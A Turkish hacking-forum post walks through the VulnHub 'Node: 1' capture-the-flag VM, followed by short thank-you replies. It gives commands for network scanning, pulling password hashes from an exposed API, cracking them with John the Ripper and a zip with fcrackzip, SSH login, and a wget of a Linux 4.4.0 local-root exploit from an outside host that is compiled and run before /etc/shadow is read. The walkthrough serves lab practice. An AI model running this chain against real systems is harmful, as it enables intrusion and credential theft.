İPUCU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Node 1 Açıklı Makine Çözümü / ch_arli41

02-09-2018 23:56
#1
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Eğitmen
Üyelik tarihi:
07/2009
Mesajlar:
953
Teşekkür (Etti):
562
Teşekkür (Aldı):
440
Konular:
57
Ticaret:
(0) %
Merhaba arkadaşlar.
Bu konumda sizlere Node:1 orta seviye açıklı makine’nin çözümünü anlatacam.Başlamadan kısa bilgi vereyim.Açık bulunan sistem user ve root flags(bayraklarını) bulmamızı istiyorlar.Ben burda sistemin şifrelerini almayı, şifrelerin kırma yöntemlerini ve sistemde root yetkisine ulaşmayı gösterecem.Sizlerden isteğim root flag(bayrağını) bulmanız.Bulduğunuz bayrağı bana iletirseniz konuya ekliyecem.


Node:1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/node-1,252/#


Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.


https://www.turkhackteam.org/siber-g...ch_arli41.html








Kod:
netdiscover

Bu komut bize modeme bağlı cihazları listeliyor.Ordan ip’yi kopyalıyoruz.







Kod:
nmap ipadresi

Bu komut ile portlara bakıyoruz.22 ve 3000 portunu gösteriyor bize 3000 portunu ipadres port numarası olarak tarayıcıma yazıyorum.







Evet karşıma web sayfası geldi.LOGIN kısmına tıklıyorum ve karşıma giriş sayfası çıktı.Şimdiki hedefim giriş bilgilerini bulmak.Bunu için Burp Suite programını kullanacam.







Firefox tarayıcımızın ayarlarını yapıyoruz.Advanced kısmına geliyoruz ve Network'a tıklıyoruz.HTTP kısmına 127.0.0.1 port kısmına 8080 yazıyoruz resimdeki gibi.





Tarayıcıda sayfayı yenile yaptığımızda burp suit proğramımıza geldi.Forward kısmına 2 yada 3 sefer tıklıyoruz.Target bölümüne geçiyoruz.







Burdaki linke sağ tıklıyoruz ve Spider this host'a tıklıyoruz.Bu şekilde brup suit proğramı tarama yapıp bütün detayları bize verecektir.








Resimde gördüğünüz gibi /api/users/ yoluna gidiyorum ve java script link yolunu kopyalıyorum.









Giriş bilgilerine ulaştık.Bilgiler şifrelendiği içi kırmamız gerekecek ilk önce şifreleme türünü bulalım.








hash-identifier

Şifreleme türünü öğrenmek için hash-identifier scriptini kullanıyoruz.Sha-256 ile şifrelendiğini öğrendik devam ediyoruz.







Kod:
john --show --format=raw-sha256 /sifreler.txt

Ben burda John the rippe şifre kırma yazılımını kullandım siz isterseniz diğer şifre kırma araçlarını kullana bilirsiniz.Burda sifreler.txt dosyasının içine kırılacak sifreleri yazıyoruz ve john the rippe programı kendi içindeki wordlist'den yararlanarak şifreleri kırıyor.










Admin panelimize giriş yapıyoruz ve backup dosyası denk geliyor anlaşılan bu iş uzuyacak gibi ama bıkmadan yolumuza devam ediyoruz.Backup dosyasını indiriyoruz.Dosyayı incelememizin sonucunda base64 ile encrypt edildiğini öğrendik.Bu dosyayı decrypt etmemiz gerekiyor.






Kod:
cat myplace.backup | base64 -d > ch_arli41
Yukardaki komut ile backup dosyasını decrypt ediyoruz ve karşımıza zip dosyası çıkıyor.Zip dosyasının içindekileri çıkarmak istediğimizde bizden şifre istiyor.







Zip dosyasını kırmak için fcrackzip yazılımını kullanacaz.Konsola fcrackzip yazıp komutların detayına baka bilirsiniz.







Kod:
fcrackzip -u -D -p wordlist.txt ch_arli41


Bu komut ile zip dosyamızın şifresini kırıyoruz.Burda dikkat edilmesi gereken nokta eğer wordlist'in içinde doğru şifre yoksa kırılmaz bunun için başka wordlist denememiz gereke bilir.








Zip dosyasından dosyaları çıkarttık./var/www/myplace dosya yoluna gidiyoruz apps.js dosyasını not defteri yada metin düzenleyiciyle açıyoruz.Ssh giriş bilgilerini aldık sisteme bağlana biliriz.









Kod:
ssh mark@ipadresi
Bu komut ile sisteme bağlandık.Şimdik sistemi inceliyelim biraz.






Resimdeki gibi sistemin bilgilerini aldım.cat /etc/shadow komutunu yazdığımda yetkimin olmadığını gördüm.Sistemde root yetkisine kendimi yükseltmem gerekecek bunun için 4.4.0 linux local root exploiti'ni aratıyorum googleden ve searchsploit kullanarak.





Kod:
cd /tmp
Kod:
wget http://cyseclabs.com/pub/upstream44.c
cd komutu ile dizin değiştiriyorum.wget komutunu kullanarak c dilinde yazılmış exploiti bulunduğum dizine indiriyorum.







gcc dosya-adi.c -o ch_arli41


Bu komut ile c dilinde yazılmış exploiti derliyorum.






Kod:
./ch_arli41

Yukardaki komut ile exploiti çalıştırıyoruz.Siz orda hangi ismi verdiyseniz o isimi yazacaksınız.






Kod:
cd ..
cat /etc/shadow

Resimde gördüğüz gibi cd komutu ile ana dizine geçiş yaptık cat komutunu kullanarak bilgileri ekrana yansıttık.



Benim anlatımım buraya kadar konunun başında dediğim gibi root bilgisini sizlerden bekliyorum.
Bir sonraki konuda görüşmek üzere..
Kullanıcı İmzası
Konu ch_arli41 tarafından (03-09-2018 00:02 Saat 00:02 ) değiştirilmiştir.

02-09-2018 23:59
#2
Üyelik tarihi:
03/2017
Mesajlar:
2.945
Teşekkür (Etti):
201
Teşekkür (Aldı):
914
Konular:
86
Ticaret:
(0) %
Elinize Sağlık Güzel Konu
Kullanıcı İmzası
Oğlum bence de dünya batsın, artık dönmeyi falan bıraksın
M3m0ry Teşekkür etti.
03-09-2018 00:02
#3
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
09/2016
Mesajlar:
4.967
Teşekkür (Etti):
60
Teşekkür (Aldı):
1140
Konular:
431
Ticaret:
(0) %
Eline emeğine sağlık.
03-09-2018 00:05
#4
theokeleS - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
05/2018
Mesajlar:
1.358
Teşekkür (Etti):
68
Teşekkür (Aldı):
357
Konular:
31
Ticaret:
(0) %
Elinize sağlık
03-09-2018 00:18
#5
'Taipan - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2015
Mesajlar:
3.876
Teşekkür (Etti):
935
Teşekkür (Aldı):
1345
Konular:
87
Ticaret:
(0) %
Eline sağlık güzel, beklenen konulardan
ch_arli41 Teşekkür etti.
03-09-2018 00:49
#6
ATABÖRÜ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Nereden:
Ötüken
Yaş:
82
Mesajlar:
3.370
Teşekkür (Etti):
950
Teşekkür (Aldı):
903
Konular:
303
Ticaret:
(0) %
Ellerine emeğine farene sağlık abi hak etmiştin
Kullanıcı İmzası
Ey Türk milleti! Kendine dön! Sen yükseltmiş Bilge Kağan'ına, hür ve müstakil ülkene karşı hata ettin, kötü duruma düşürdün. Milletin adı, sanı yok olmasın diye Türk milleti için gece uyumadım, gündüz oturmadım. Kardeşim Kül Tegin ve iki şad ile ölesiye bitesiye çalıştım.
03-09-2018 00:59
#7
oldnco - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Yaş:
29
Mesajlar:
1.525
Teşekkür (Etti):
636
Teşekkür (Aldı):
370
Konular:
43
Ticaret:
(0) %
Elinize emeğinize sağlık

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı